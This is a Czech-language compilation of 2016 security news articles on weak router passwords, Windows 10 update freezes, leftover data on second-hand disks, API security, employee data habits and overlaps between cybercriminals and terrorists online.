25.10.2016 SecurityWorld Hrozby Mezi nejčastější problémy patří softwarové zranitelnosti a slabá hesla – kvůli nim je každý sedmý směrovač zranitelný. Internetový router se tak může jednoduše stát doslova Achillovou patou zabezpečení.
Eset uveřejnil průzkum, který se zaměřil na jednu z nejvíce podceňovaných bezpečnostních hrozeb – domácí routery. Vyplynulo z něj, že 15 procent testovaných zařízení používá slabá hesla, nejčastěji s uživatelským jménem „admin“.
Z průzkumu dále vyplynulo, že přibližně 7 % testovaných zařízení obsahovalo zranitelnost, kterou bychom mohli označit jako středně nebo vysoce vážnou. Skenování portů odhalilo, že síťové služby jsou velmi často přístupné nejen z vnitřních, ale i z externích sítí.
„Test se zaměřil na kontrolu výchozích uživatelských jmen a hesel a jejich nejčastěji používaných kombinací. Je znepokojující, že v jednom případě ze sedmi byl útok úspěšný,” říká Peter Stančík, Security Evangelist v Esetu.
„Zejména nezabezpečené služby jako je Telnet by rozhodně neměly být otevřené a to ani do interních sítí, což bylo bohužel zjištěno ve 20 procentech případů,“ dodává Stančík.
Většina nalezených zranitelností, více než 50 %, vycházela z nevhodně nastavených přístupových práv.
Druhou nejčastější zranitelností (40 %) bylo zneužití použitých příkazů metodou „command injection“. Ta cílí na spouštění libovolných příkazů ve vzdáleném operačním systému skrze zranitelnosti v aplikacích, které nemají dostatečně ošetřeno ověření vstupů.
Bezmála 10 % softwarových zranitelností se pak týkalo takzvaného cross-site scriptingu (XSS), který umožňuje útočníkovi měnit konfiguraci routeru tak, aby mohl spouštět škodlivé skripty na straně klienta.
„Výsledky ukazují, že routery lze napadnout poměrně jednoduše zneužitím některé z nalezených zranitelností. Mohou se tak stát Achillovou patou zabezpečení domácností i malých firem,” dodává Stančík.
Výsledky se sbíraly od uživatelů řešení Esetu (Smart Security a Smart Security Premium), kde je nově implementovaná funkce ochrany domácí sítě, která umožňuje uživatelům zjistit případné zranitelnosti v podobě špatné konfigurace, potenciálně nebezpečné síťové služby či slabého hesla na jejich domácích routerech.
Peníze do technologií ano, do vzdělávání lidí ne -- firmy riskují, že jim zabezpečení dat selže
24.10.2016 SecurityWorld Hrozby Firmy v tuzemsku chápou význam zajištění bezpečnosti svých dat i aplikací a investují nemalé prostředky do technologií. Často ale zapomínají na to, že by měli investovat také do lidí, kteří s těmito technologiemi pracují.
Podle průzkumů jsou v současné době až dvě třetiny firem do značné míry závislé na IT, objemy nashromážděných dat se každoročně zvyšují o třetinu.
Zajištění bezpečnosti dat a systémů vedení firem ve valné většině vnímají jako svou prioritu, investice do zabezpečení podle informací Gartner aktuálně meziročně narostly o 3,6 %.
Často ale zapomínají na investici do lidí, kteří s těmito systémy pracují, což drasticky snižuje jejich schopnost účinně se bránit i efektivnost vynaložených prostředků. Přitom krádež nebo poškození dat, případně pokus o ně, zažilo v posledním roce téměř 70 % firem.
„Vrcholoví manažeři si v současné době uvědomují, že investice do zabezpečení firemních dat a systémů jsou nezbytné. Málokdy ale pamatují také na to, že samotné systémy bez vzdělaných odborníků, kteří si udržují povědomí o aktuálních trendech a hrozbách, jsou neúčinné,“ říká William Ischanoe, produktový manažer kurzů oblasti IT bezpečnost ve firmě Gopas.
Ta pořádá v těchto dnech svou klíčovou konferenci HackerFest 2016 zaměřenou na IT bezpečnost a etický hacking. Prezentuje se zde například to, jak útočí současní hackeři, která nebezpečí číhají v kyberprostoru, jaké jsou největší aktuální hackerské hrozby, nebo k čemu hackeři využívají ovládnuté počítače. Partnerem konference je naše vydavatelství.
Microsoft má problém, uživatelům zamrzá Windows 10 po instalaci Anniversary update 8.82016 Zdroj: Živě Hrozby
po instalaci výroční aktualizace některým uživatelům zamrzne systém Závažná chyba znemožní další práci, její odstranění zpravidla obnáší přeinstalování systému nebo návrat na předchozí sestavení Microsoft má problém, uživatelům zamrzá Windows 10 po instalaci Anniversary update Microsoft uvolnil výroční aktualizaci Anniversary Update teprve minulý týden a postupně ji distribuuje mezi další uživatele. Podobně jako každý větší update však i tento letní přinesl části uživatelů také velké starosti – systém jim totiž konstantě zamrzá.
Na problém upozornil web Neowin, který čerpá z dlouhého vlákna na Redditu. V tom se sešlo několik stovek komentářů od uživatelů, kterým systém zamrzne ihned po startu či krátce po něm. Aplikace často zobrazí svoje okna, nicméně zůstávají ve stále stejném nečinném stavu. Následně dojde k jejich zčernání a chybové hlášce, že Windows přestal pracovat.
Ačkoliv se ve vláknu objevilo několik možných řešení, ani jedno z nich se nezdá být univerzálním. Někteří z uživatelů vyřešili problém odpojením druhého disku, přeinstalací systému z obrazu ISO, objevil se také krátký návod na úpravu registrů, která může pomoci. U každého řešení však velký počet diskutérů píše, že na situaci nic nezměnilo.
Chyba se objevuje u uživatelů s mnoha různými konfiguracemi – bez ohledu na to, zda se jedná o desktop či notebook a nezáleží ani na konfiguraci samotných komponent. Na fóru Microsoftu pak najdeme popsaný stejný problém, zatím zde však objevíme pouze reakci jednoho ze zaměstnanců podpory v podobě univerzální odpovědi.
Pokud se setkáte s podobným problémem, pak je zatím jediné možné řešení – návrat ke staršímu buildu.
České firmy podceňují kybernetické hrozby
27.7.2016 Zdroj: SecurityWorld Hrozby Společnost VMware zveřejnila výsledky průzkumu zaměřeného na oblast kybernetické bezpečnosti v České republice. Průzkum poukázal na to, že české podniky si riziko kybernetických útoků příliš nepřipouští. Na otázku týkající se zranitelnosti odpovědělo 98 % IT manažerů, že infrastrukturu ve své firmě jako zranitelnou nevnímá. Češi se v tomto ukazují jako přehnaně optimističtí v porovnání se zbytkem Evropy. Podle průzkumu společnosti VMware v regionu EMEA (Evropa, Střední Východ a Afrika) totiž očekává více než třetina IT manažerů vážný kybernetický útok v příštích 90 dnech.
Jak odhalil výzkum, ochrana proti kybernetickým útokům patří mezi prioritami firem působících v České republice na nejnižší pozice, za klíčovou ji označilo pouze 15 % dotazovaných. První tři místa obsadily tradiční obchodní cíle, jako je růst firmy, akvizice zákazníků a inovace.
Rizika spojená s kybernetickými hrozbami, jako je ztráta intelektuálního vlastnictví, kompromitace zákaznických dat, případně ohrožení třetích stran, přitom mohou mít pro firmu nedozírné následky, ať už se jedná o horší obchodní výsledky, poškození dobrého jména firmy nebo ztrátu konkurenční výhody.
„Zatímco výsledky našeho průzkumu v regionu EMEA poukazují na to, že firmy musí čelit narůstajícímu riziku kybernetických útoků, v České republice je situace velice rozdílná a vážného kybernetického útoku během příštích 90 dnů se obává pouze 5 % dotazovaných. Se vzrůstající digitalizací a zvyšujícím se počtem kybernetických útoků je ochrana firemní infrastruktury stále náročnější. V takovém prostředí už tradiční nástroje a metody nemusí být dostačující,“ komentuje Vladimír Střálka, Country Manager společnosti VMware pro Českou republiku a Slovensko.
Více než tři čtvrtiny dotazovaných (77 %) označily jako největší riziko pro firemní bezpečnost a nejpravděpodobnější terč kybernetického útoku nedbalé nebo nedostatečně informované zaměstnance.
Vlastní zaměstnanci jsou považováni za hrozbu i v případě narušení dat. Podle IT manažerů jsou nejčastější příčinou úniku dat nevyškolení zaměstnanci (79 %), zaměstnanci ztrácející mobilní zařízení (55 %) a nepoctiví zaměstnanci (52 %).
Pozor! Na discích z druhé ruky zůstává plno privátních informací
27.7.2016 Zdroj: SecurityWorld Hrozby Než svůj starý HDD odhodíte pryč nebo přeprodáte skrze bazarovou službu, jakými jsou eBay či Craigslist, dejte si pozor, aby vaše data byla opravdu pečlivě smazána; jinak by se mohla dostat do nepovolaných rukou. Nová studie prokázala, že velká část uživatelů nechtěně dává k dispozici osobní fotky, finanční údaje a různá další data kvůli nedokonalému smazání dat.
Blancco Technology Group, firma, specializovaná právě na mazání dat, provedla na toto téma průzkum. Náhodně nakoupila 200 secondhandových úložných jednotek přes eBay a Craigslist; cílem bylo zjistit, zda se společnosti podaří nějaká data „zachránit“.
Výsledek je ohromující. V neuvěřitelných 78 % disků se objevují zbytková data, která by šla obnovit. Z celkového počtu náhodně vybraných 200 disků tak celých 156 alespoň nějaká data obsahuje.
Jen o něco méně, 67 %, tedy 134 disků, obsahuje data osobní: fotografie, životopisy, finanční údaje. Pokud by dostaly do špatných rukou, mohly by vést až k ukradení identity a dalším podvodům, varuje firma.
Již rozumnější číslo, 22 disků, tedy 11 %, zahrnuje i data firemní: Emaily, tabulky, zákaznické informace.
Vydaná studie výtečně podtrhuje existující bezpečnostní vady s elektronikou z druhé ruky. Předchozí majitelé často nevymažou správně všechna data uvnitř. Kupříkladu digitální fotokopírky se občas předprodávají i přesto, že mají v paměti stále ještě všechny dokumenty, které kdy oskenovaly.
Staré HDD mohou být přímo zlatým dolem pro hackery. Smazání dat se může zdát majiteli jednoduché, ale pouhé přesunutí souborů do koše opravdu nestačí, varuje Blancco ve své studii.
V jiných případech uživatel využije funkci rychlého formátování, která je však podobně neúčinná: Tento způsob data nevymaže natrvalo, pouze je nechá skryté, avšak obnovitelné, píše se v textu.
Ze všech prozkoumaných disků mělo pouhých 10 %, tedy 20 disků, všechna data bezpečně vymazána, popisuje firma. Uživatelům tak radí použít patřičný software ke správnému odstranění všech souborů.
Tyto nástroje mohou např. veškerou paměť disku dočasně zahltit nesmyslnými informacemi: Tím zajistí, že žádná zbytková data uživatele nebudou obnovitelná.
Blancco studii provedla v prvním čtvrtletí tohoto roku, většina disků byla klasickými HDD.
Nepodlehněte nebezpečným rozhraním API
27.7.2016 Zdroj: SecurityWorld Hrozby Podle webu programmableweb.com v současné době existuje více než 13 700 veřejně dostupných rozhraní API. Ne všechny jsou ale bezpečné. Jaké kroky byste měli udělat, aby se mohly obavy rozplynout? Mnoho zákazníků kaváren Starbucks bylo šokovaných, když se zjistilo, že kyberzločinci kradou peníze z jejich kreditních karet a platebních účtů tím, že se vlomí do jejich mobilních aplikací Starbucks.
Příčinou byla pravděpodobně díra v rozhraní API, přestože nebyla na webu Starbucks, ale v další aplikaci, kde došlo ke krádeži a použití zprofanovaných hesel.
Web Moonpig s blahopřáními a mobilní aplikace Snapchat měly podobný osud v důsledku rozhraní API, které řídí způsob komunikace aplikací mezi sebou a s daty, se kterými aplikace pracují.
Nedávno způsobilo nezabezpečené rozhraní API, že web Moonpig vystavil osobní záznamy a dílčí údaje o kreditních kartách svých tří milionů zákazníků. Dva exploity v rozhraní Snapchat API zase hackerům dovolily zjistit souvislost mnoha telefonních čísel se jmény a vytvořit miliony falešných účtů.
API láká hackery
Proč se rozhraní API tak často stávají cílem hackerů? Protože jsou všude, uvádí Randy Heffner, analytik zabezpečení ve společnosti Forrester Research. Každá firma si vytváří své rozhraní API pro podporu svého webu či mobilní aplikace, protože jim to umožňuje rychlejší inovace a integraci vnějšího obsahu.
Salesforce.com generuje 50 procent svých příjmů právě prostřednictvím rozhraní API, Expedia.com generuje dokonce 90 procent a také eBay uvádí, že 60 procent jeho příjmů pochází z rozhraní API.
„Širší pozornost věnovaná rozhraním API dává hackerům nové a zajímavější pole působnosti,“ vysvětluje Heffner.
Většina rozhraní API je k dispozici komukoli z internetu, protože běží na webových serverech. Stejně jako webové stránky mohou být i rozhraní API předmětem zkoumání a procházení od vyhledávacích botů či hackerů.
Zabezpečení API je tedy oblastí, která vyžaduje specifický podnikový pečlivý dohled, dodává Heffner.
„Nechceme rozhraní API připomínající ponorky, běžící tiše a s hloubkovým ponorem, protože pokud jednou někdo pronikne na váš web, zjistíte to velmi rychle. Pokud však někdo pronikne do vašeho API, nemusíte to zjistit vůbec.“
Důvody zranitelností
Proč se ale v rozhraních API vyskytují chyby zabezpečení? Vývojáři nebývají dostatečně zdatní v oblasti zabezpečení a rychlost uvádění na trh ovlivňuje veškeré testování a péči, kterou mohou programátoři věnovat svému kódu.
„Tráví mnohem více času přinášením hodnot do aplikací než péčí o jejich zabezpečení, což může vést ke vzniku bezpečnostních děr,“ vysvětluje Allyn Fay, technický marketingový manažer společnosti Ping Identity, která je dodavatelem systémů pro správu identit a přístupu.
Také mezi samotnými vývojáři rozhraní API se velmi málo komunikuje, což brání vzniku širších bezpečnostních standardů.
„V každé společnosti mají všechny obchodní jednotky mandát publikovat rozhraní API, a přitom vzájemně spolu nekomunikují,“ tvrdí Subra Kumaraswamy, šéf zabezpečení produktů ve společnosti Apigee, která vyvíjí rozhraní API.
„Pokud jsem jednotka, která zajišťuje dodávky, nebo platební společnost vytvářející platební rozhraní API,“ nebavíme se o tom mezi sebou, dodává Kumaraswamy.
A co víc, vývojáři jsou pod tlakem, aby rychleji inovovali, což může také vytvářet zranitelnosti, uvádí Kumaraswamy. „Můžete dělat chyby ať už tím, že neúmyslně způsobíte únik dat nebo že do rozhraní API nedáte ty správné kontroly.“
Tady jsou příklady kroků, které byste měli učinit, pokud chcete, aby byla vaše rozhraní API bezpečná.
1. Ucpávání děr
Vývoj aplikací nevykazuje nějaké známky zpomalení, ale firmy mohou podniknout kroky k ucpání děr v rozhraních API.
Když přijde na zabezpečení aplikací a rozhraní API, „ve webových aplikacích obvykle musíte jen ověřit totožnost koncového uživatele. Ve světě rozhraní API musíte také autentizovat aplikaci,“ uvádí Kumaraswamy.
„Pokud například používáte AirBnB nebo aplikaci Uber, tato řešení volají svá rozhraní API, takže tím dochází k jejich autentizaci.“ V případě webu Moonpig došlo k vynucování autentizace, ale ne autorizace, dodává Kumaraswamy.
Použití standardizovaného protokolu, který existuje jak pro autentizaci, tak i pro autorizaci, je základem k bezpečnému používání rozhraní API, dodává Fay.
Pokud to uděláte správně, bude rozsah integrovaného zabezpečení založen na standardu a nebude se v různých aplikacích lišit.
2. Šifrování přenosů
Vždy šifrujte citlivá data, radí Heffner. Nikdy nevytvářejte bezpečnostní díru tím, že byste používali přenosy přímo čitelného textu.
Vývojáři by měli používat SSL certifikáty pro webová rozhraní API, která přenášejí citlivé informace mezi programem v koncovém bodu a rozhraním webové služby, protože hackeři mohou tato data odposlouchávat.
Pokud použijete své rozhraní API v rámci podadresáře své aktuální webové aplikace, můžete použít stejný bezpečnostní certifikát, který máte pro své webové stránky.
3. Ochrana přihlašovacích údajů
Pochopte správně způsob správy přihlašovacích údajů pro aplikaci a jejich důležitost pro jednotlivé druhy scénářů, dodává Heffner.
„Kdybych byl bankou vykonávající finanční transakce s partnerem, existuje řada vrstev připojení, které bych chtěl mít – jako je VPN na SSL – nebo bych používal digitálně podepsané tokeny SAML apod. jako součást úplného bezpečnostního systému,“ tvrdí Heffner
Podle něj, když se použije více bezpečnostních mechanismů, ztěžuje to náročnost a počet úkonů, které musí někdo udělat, když chce takové spojení odposlouchávat.
Digitálně podepsané tokeny také mohou být jednou ze součástí bezpečnostního systému. Tokeny jsou řetězce znaků, které jednoznačně identifikují uživatele. Lze je ukládat v databázi a poskytnout přístup jen v případě, že uživatel zadá správné uživatelské jméno a heslo.
Token se potom použije uživatelem rozhraní API k přístupu k metodám rozhraní API.
4. Vyhněte se statickým a vestavěným heslům
Když je logika vestavěná do aplikace, je velmi těžké to změnit, vysvětluje Fay. Chcete-li změnit zásady nebo zaktualizovat zabezpečení, není vestavění veškeré této logiky do mobilních aplikací úplně dobrou věcí.
Vývojáři si někdy zjednodušují život obyčejnými hesly nebo ukládáním ID a hesel místně v mobilní aplikaci, a to je z bezpečnostního hlediska obrovský problém. „Statická hesla by se opravdu neměla používat,“ připomíná Fay.
5. Svému rozhraní API předávejte jen nutné informace
Vývojáři často vezmou všechny informace, které mají o uživateli, a předají je rozhraní API, protože nevědí, jaká data jsou třeba, říká Fay.
„Zajistěte, abyste přenášeli jen takové informace, které potřebujete,“ doporučuje Fay a dodává: „Je to více záležitost soukromí než zabezpečení,“ ale může to být zneužívané v metodách sociálního inženýrství.
Výzkum: Zaměstnanci nedbají na bezpečnost
27.7.2016 Zdroj: SecurityWorld Hrozby Dobrou zprávou je, že oproti loňsku výrazně vzrostl počet lidí, kteří k zajištění vzdáleného přístupu k datům používají bezpečné firemní nástroje. Špatnou zprávou je, že současně roste i počet lidí, kteří si stále práci domů posílají přes soukromý email. Využívání firemního cloudu letos oproti roku 2015 výrazně vzrostlo (z 29 % na 43 %) a Česko se tak z loňských spodních příček dostalo na evropský průměr (45%). Téměř polovina (46 %) zaměstnanců si ale stále ještě posílá pracovní soubory na soukromý email, což je o 7 procentních bodů více než loni.
Využívání spotřebitelských úložišť se zdvojnásobilo (ze 14 % na 30 %). Soukromé maily ani běžná úložiště přitom nemohou zajistit potřebnou míru ochrany citlivých obchodních informací. Vyplývá to z nového ročníku průzkumu Náskok díky technologiím, který si nechal zpracovat Microsoft.
Lidé chápou nutnost dobře chránit informace, ke kterým na dálku přistupují. 9 z 10 šéfů a 79 % zaměstnanců zdůraznilo, že při práci mimo kancelář je nezbytné zajistit bezpečnost dat.
„Jenže praxe stále ještě pokulhává. Používání soukromých mailů pro sdílení pracovních dokumentů může pro firmy představovat časovanou bombu,“ uvedl Ondřej Novodvorský, ředitel pro malé a střední firmy z Microsoftu. "Do práce patří profesionální pracovní nástroje a platí to i o technologiích."
Není přitom řešním mobilitu omezovat. V letošním průzkumu uvedly téměř tři čtvrtiny (72 %) zaměstnanců českých SMB, že možnost pracovat mimo kancelář zvyšuje jejich produktivitu. Firmy by se jejím omezením připravily o důležitý zdroj výkonnosti, kreativity i nových obchodních příležitostí.
„Lidé dnes mobilně žijí a jsou zvyklí komunikovat a sdílet na dálku. Pokud firma svým zaměstnancům nenabídne bezpečné nástroje a nenaučí je správně používat, najdou si jinou cestu. A to může být pro bezpečnost firemních dat velký problém,“ řekl Ondřej Novodvorský.
Teroristé sdílejí poznatky s kyberzločinci – jak moc jsou tyto skupiny propojené?
27.7.2016 Zdroj: SecurityWorld Hrozby Nejvíce informací o zneužívání legitimních nástrojů a služeb na internetu sdílejí dvě skupiny: kyberzločinci a teroristické organizace, jak zjistili experti Trend Micro. Odlišují se však motivy, které je k tomu vedou – prvně jmenovaní jsou motivovaní finančním ziskem, druzí mají za cíl šířit především propagandu. On-line přítomnost teroristických organizací a kyberzločinců se v mnohých bodech překrývá. Obě skupiny komunikují prostřednictvím stejných kanálů a používají stejné technologie, což ve výsledku značně komplikuje možnosti jejich sledování.
Při nezákonné činnosti v on-line prostředí jde vždy o zneužití zákonných nástrojů a služeb. Příkladů těchto aktivit je mnoho, od využívání zranitelností v softwaru, webových stránkách a internetových aplikací přes hostování škodlivých složek v cloudových službách až po využívání tzv. clickbait příspěvků a odkazů na sociálních sítích.
Teroristé a kyberzločinci sdílejí i společné komunikační metody. Aby si zachovali anonymitu, využívají obě skupiny především nástroje určené pro ty, kteří mají legitimní důvod skrývat svoji identitu (např. novináři, interní informátoři či aktivisté).
Podle analytiků Trend Micro patří mezi nejvyužívanější komunikační kanály tzv. deep web (webstránky a databáze, které neindexují běžné internetové vyhledávače a jsou dostupné pouze prostřednictvím systému TOR - The Onion Router, určeného na anonymní prohledávání webu), bezpečné, nesledovatelné e-mailové služby a sociální média.
Teroristé používají stejné metody, ale za jiným účelem – na rozdíl od vydírání primárně pro komunikaci, koordinaci a šíření propagandy.
Jedním z nejvýraznějších rozdílů mezi kyberzločinci a teroristy je úsilí těch druhých o šíření propagandy. Zatímco hlavním cílem kyberzločinců je především krádež finančních prostředků v elektronickém prostředí a udržení si anonymity, teroristé se snaží hlavně o to, aby se jejich odkaz rozšířil mezi co možná nejširší publikum v naději na získání potenciálních sympatizantů.
Routery jsou stále větší bezpečnostní slabinou internetu. Riziko útoků na ně stoupá
23.7.2016 Zdroj: Novinky/Bezpečnost Hrozby Rájem pro hackery všeho druhu se stávají routery, jejichž prostřednictvím se k internetu připojuje stále větší počet mobilních zařízení. Do roku 2020 bude díky Internetu věcí na routerech závislých přes 20 miliard zařízení na celém světě, na zabezpečení směrovačů ale většina uživatelů stále zapomíná. Z routerů se tak stává pověstný nejslabší článek internetu, jehož prostřednictvím může docházet k útokům jak na domácnosti, tak na firmy.
„Proniknout do routeru není pro útočníky o moc těžší než se dostat do počítače. Většinou totiž nebývají vůbec chráněny,“ říká Petr Šnajdr, bezpečnostní expert společnosti ESET.
Většina lidí zapomíná na routerech změnit přednastavené heslo. Petr Šnajdr, bezpečnostní expert společnosti ESET Drtivá většina domácích, ale překvapivě i firemních routerů využívá stejné nastavení, v jakém jej uživatelé získali a instalovali. Dokonce na nich bývají přednastavená jednoduchá hesla, která lze hravě odhadnout nebo prolomit.
Router je přitom bránou mezi veřejným internetem a soukromým počítačem, a neměl by tedy být tak snadným terčem útoku. Zvláště pak ve chvíli, kdy se jeho prostřednictvím k internetu připojují nejen počítače, ale i chytré mobilní telefony, tablety, notebooky a další inteligentní části domácnosti.
Stará hesla a neaktualizovaný firmware Pohodlné ovládání inteligentního zámku se ale může změnit v noční můru ve chvíli, kdy díky nedostatečně zabezpečenému routeru útočník dveře na dálku odblokuje nebo zablokuje podle toho, zda chce dům vykrást nebo jeho obyvatele uvěznit uvnitř.
„Většina lidí zapomíná na routerech změnit přednastavené heslo a aktualizovat firmware, takže útočníkům velice usnadňují práci,“ konstatuje Petr Šnajdr. Vinni nejsou jen samotní uživatelé, chyba je i na straně výrobců routerů, kteří nevytvářejí automatické aktualizace, jež by tento problém částečně řešily.
Z průzkumu, který v roce 2015 spustila společnost ESET společně s National Cyber Security Alliance ve Spojených státech, vyplynulo, že téměř 80 procent Američanů má bezmeznou důvěru k bezpečnosti domovské sítě a zařízení, která jsou k ní napojena.
Zároveň však dvě z pěti amerických domácností přiznaly, že nikdy nezměnily přednastavená hesla u svých routerů zadaná v továrním nastavení. Stovky tisíc směrovačů jsou tak vystaveny bezprostřednímu kybernetickému útoku, při němž hacker může přesměrovávat vyhledávané internetové stránky na podvodné weby a pomocí takovýchto phishingových útoků získat přístup k online účtům uživatelů.
Routery lze zneužít k DDoS útokům Hackeři rovněž mohou využít napadené routery pro masivní DDoS útoky, jako se to stalo o Vánocích 2015, kdy skupina označovaná Lizard Squad pomocí sítě desítky tisíc zneužitých routerů vyřadila internetové stránky společností Sony a Microsoft a znemožnila tak miliónům uživatelů vyzkoušet hry Xbox Live a PlayStation Network, které dostali pod stromeček. Lizard Squad se vyloženě specializuje na odhalování nezajištěných routerů s nezměněnými hesly z továrního nastavení a vytváří z nich síť robotů, kterou zneužívá k takovýmto masivním DDoS útokům.
„Hlavní obranu představuje upgrade firmwaru routeru na aktuální verzi a nepoužívání mnohdy triviálních přednastavených přihlašovacích údajů. Rovněž je vhodné zvážit omezení přihlašování k routeru pouze z vnitřní sítě, a nikoliv z internetu. Řada uživatelů tak přijde o komfortní správu routeru odkudkoli, na druhou stranu zabrání některým typům útoků,“ vypočítává Petr Šnajdr.
Pokud si uživatel není jist, zda je jeho router napaden, a eviduje neočekávané požadavky na stažení a aktualizaci nějakého softwaru, které by mohly představovat bezpečnostní hrozbu, stačí se jednoduše připojit k webu prostřednictvím mobilního připojení a zkontrolovat, zda se stejná výzva k instalaci zobrazí rovněž na mobilu. Pokud ne, router je zavirován.
Děsivé je tiché luxování dat, varuje kybernetický expert
27.7.2016 Zdroj: Novinky/Bezpečnost Hrozby Světové mocnosti více než kdy předtím pomocí počítačových sítí šmírují data o vládních institucích, energetice, továrnách i komunikačních systémech. Občas chaos řízený na dálku někde lokálně vyzkoušejí. Je to zlatá éra pro hackery. Firmy s vládami se o ně přetahují. Chybějí však tisíce specialistů, kterým by se dalo věřit. Vyplývá to z rozhovoru Práva s předním expertem na počítačovou kriminalitu, 58letým Alešem Špidlou. Je otcem národní kybernetické bezpečnostní strategie, pracoval na ministerstvu vnitra a dnes působí v řízení rizik u českého zastoupení globální poradenské společnosti PricewaterhouseCoopers (PwC).
Podle něj je až děsivé, s jakou intenzitou se dnes tiše sbírají data o citlivé infrastruktuře.
Citlivé nemocnice „Pořádkumilovní Němci nedávno našli v informačních systémech jaderné elektrárny dva viry, které tam podle všeho nenápadně šmírovaly několik let. Jeden z těch virů byl nejaktivnější v roce 2008 a v elektrárně ho našli až nyní. Komu posílal informace a jaké? Jediné, co se ví, je, že aktivně odesílal informace. Někam,“ popisuje Špidla.
Stále častější jsou i útoky na systémy, které řídí nejrůznější technologie v průmyslu. „Před časem hackeři napadli v Německu systémy pro řízení vysoké pece. Stala se neřiditelná a musela být odstavena,“ poukazuje Špidla na další případ.
Kybernetický útok může snadno rozkolísat společnost, znevěrohodnit vládní instituce. „Stačí na několik týdnů zablokovat systém pro výplatu sociálních dávek. Nejcitlivější je ovšem energetika, plynovody, vodárenství, informační systémy. Do kritické infrastruktury se nejspíše brzy zahrnou zdravotnická zařízení. Budou muset přijímat nová bezpečnostní opatření,“ řekl Špidla.
Na nemocnice s milióny citlivých údajů si brousí zuby i organizovaný zločin. „Nedávno hackeři zablokovali databázi pacientů v nemocnici v USA. Chtěli výpalné a nemocnice ho zaplatila,“ připomíná americký právník a partner české PwC Legal Michael Mullen.
Semeništěm hackerů ovšem podle Špidly i Mullena bývají státy sponzorované skupiny.
„V Číně je jedna celá vojenská divize, která se věnuje kybernetickému boji, špionáži. I s podpůrnými jednotkami, ať už oficiálními nebo neoficiálními, se jedná asi o padesát tisíc lidí. O Rusku se říká, že jen někde ve Voroněži sedí kolem dvanácti tisíc odborníků, kteří provádějí hackerské aktivity pro stát. Stopy závažných událostí, jako jsou kybernetické útoky v Gruzii a Estonsku, vedou do Ruska,“ shrnuje Špidla. Na hackerských fórech si podle něj bez ruštiny skoro neškrtnete.
Izraelci pomáhají vycvičit Čechy Hackeři přesměrovali například tok plynu v plynovodu z Ázerbájdžánu tak, aby šel přes Rusko. Čtrnáct dní trvalo, než se to podařilo vrátit zpátky.
„Než začne opravdová válka, je výhodné vyvolat chaos. Několik týdnů před konfliktem v Gruzii měl prezident totálně zmatené webové stránky, selhávaly informační a komunikační systémy státní správy. Do takovéhoto chaosu není těžké vjet s tanky,“ vysvětluje Špidla.
Potíž při hledání lidí na kyberochranu státu je loajalita. „Dobré to mají v Izraeli, kde se lidé znají z armády a nemají problém v případě potřeby pracovat pro oficiální struktury. Je velmi dobře, že Česko uzavřelo s Izraelem smlouvu o sdílení informací, týkající se kybernetické bezpečnosti. Jsou vycvičeni neustálým bojem,“ tvrdí Špidla.
Izraelci se podle něj podíleli na vzniku kybernetického výcvikového centra CyberGym v Řitce u Prahy. Zde se cvičí policisté v nedávno ustanoveném týmu proti kybernetické kriminalitě.
„Naše policie disponuje kvalitními odborníky, ale je jich málo. Je problém sehnat počítačové specialisty do těchto složek. Soukromá sféra tyto specialisty platí úplně jinak. Odborníků na počítačovou bezpečnost je ale celosvětově málo. Například FBI má na to speciální program: hackerům předkládá velmi zajímavé nabídky, aby je přemluvil ke spolupráci,“ uvedl Špidla.
Teroristé se na internetu pohybují stejně obezřetně jako kyberzločinci
27.7.2016 Zdroj: Novinky/Bezpečnost Hrozby Teroristé používají na internetu podobné techniky a metody jako počítačoví piráti. Například sdílejí stejné komunikační kanály, aby si zajistili anonymitu. Vyplývá to z analýzy kyberkriminality antivirové společnosti Trend Micro. „Online přítomnost teroristických organizací a kyberzločinců se v mnohých bodech překrývá. Obě skupiny komunikují prostřednictvím stejných kanálů a používají stejné technologie, což ve výsledku značně komplikuje možnosti jejich sledování,“ uvedl Václav Petrželka, regionální manažer společnosti Trend Micro.
Podle něj patří mezi nejvyužívanější komunikační kanály tzv. deep web. To jsou internetové stránky a databáze, které nejsou přístupné z klasických internetových prohlížečů a vyhledávačů. K jejich zobrazení je potřeba používat systém Tor, respektive Tor Browser.
Anonymita zajištěna Jeho použitím si hackeři, a potažmo také teroristé, zajistí anonymitu a zároveň získají přístup ke skrytým serverům v doméně onion, ke kterým se z „běžného“ internetu uživatelé nedostanou. Na nich se běžně obchoduje například se zbraněmi nebo s chybami v operačních systémech a dalšími programy, na které zatím bezpečnostní experti ještě neupozornili.
Nabízí se otázka, proč nejsou skryté servery na internetu blokovány. Jsou totiž důležité a užitečné například pro občany v nedemokratických režimech, kterým umožňují anonymně komunikovat a vyjadřovat na internetu své názory bez obav z postihu.
Jak se dá patrně tušit, deep web využívají teroristé jednak k nákupu zbraní, jednak k propagandě. „Zatímco hlavním cílem kyberzločinců je především krádež finančních prostředků v elektronickém prostředí a udržení si anonymity, teroristé se snaží hlavně o to, aby se jejich odkaz rozšířil mezi co možná nejširší publikum v naději na získání potenciálních sympatizantů,“ doplnil Petrželka.
Šifrovaná komunikace Pro komunikaci mezi sebou totiž teroristé zpravidla tyto ukryté weby nevyužívají. K dispozici mají totiž daleko sofistikovanější řešení – například vlastní aplikaci pro šifrovanou komunikaci, jak se ukázalo na začátku roku.
Tu využívá například Islámský stát, díky čemuž bezpečnostním složkám z různých koutů světa prakticky znemožňuje určovat jejich další cíle.
Aplikace zvaná Alrawi jasně ukazuje, jak mocným nástrojem může být v rukou teroristů obyčejný chytrý telefon. Nemusí jít přitom ani o žádný speciální model s vojenskou certifikací a zabezpečením, ale klidně jen o levný smartphone za pár stovek s operačním systémem Android.
Aplikaci střeží jako Enigmu Právě na této platformě totiž chatovací aplikace Alrawi běží. Jak upozornil server Tech Crunch, aplikace nemůže být stažena z oficiálního obchodu Google Play, Islámský stát ji distribuuje mezi své bojovníky sám. A ti ji střeží podobně jako dříve nacisté šifrovací stroj Enigmu.
Program funguje velmi podobně jako jiné šifrovací nástroje. V chytrém telefonu se komunikace zakóduje pomocí speciálního klíče a teprve poté putuje přes internet nebo sítě mobilních operátorů k příjemci – v tomto případě jinému bojovníkovi Islámského státu.
Díky tomu, že je v aplikaci příjemce příslušný klíč, je ji možné opět snadno rozšifrovat. Pokud by tedy zprávu zachytili bezpečnostní experti stojící na druhé straně barikády, jen těžko by byli schopni bez příslušného klíče získat její obsah.
Výzkum: Zaměstnanci nedbají na bezpečnost
27.7.2016 Zdroj: ComputerWorld Hrozby Dobrou zprávou je, že oproti loňsku výrazně vzrostl počet lidí, kteří k zajištění vzdáleného přístupu k datům používají bezpečné firemní nástroje. Špatnou zprávou je, že současně roste i počet lidí, kteří si stále práci domů posílají přes soukromý email.
